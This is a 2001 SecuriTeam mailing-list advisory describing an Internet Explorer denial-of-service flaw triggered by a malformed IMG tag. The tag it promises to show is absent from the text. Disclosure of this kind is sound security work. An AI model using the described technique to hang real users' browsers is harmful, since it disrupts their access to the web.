[NT] IE Denial of Service (Bad IMG Tag)

From: support@securiteam.com
Date: 12/14/01


From: support@securiteam.com
To: list@securiteam.com
Date: Fri, 14 Dec 2001 21:51:58 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  IE Denial of Service (Bad IMG Tag)
------------------------------------------------------------------------

SUMMARY

Internet Explorer suffers from a denial-of-service vulnerability that
allows a web site administrator to cause the client to stop responding to
legitimate web requests.

DETAILS

An image tag with garbage characters in a particular order can cause
Internet Explorer to hang, resulting in a denial of service.

The problematic tag is as follows (note that the 'I' of IMG has been
replaced, to prevent the vulnerability from occurring):

ADDITIONAL INFORMATION

The information has been provided by zeno <zeno@cgisecurity.net>
and Jeff Sampson <screff@routing.org>.


DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


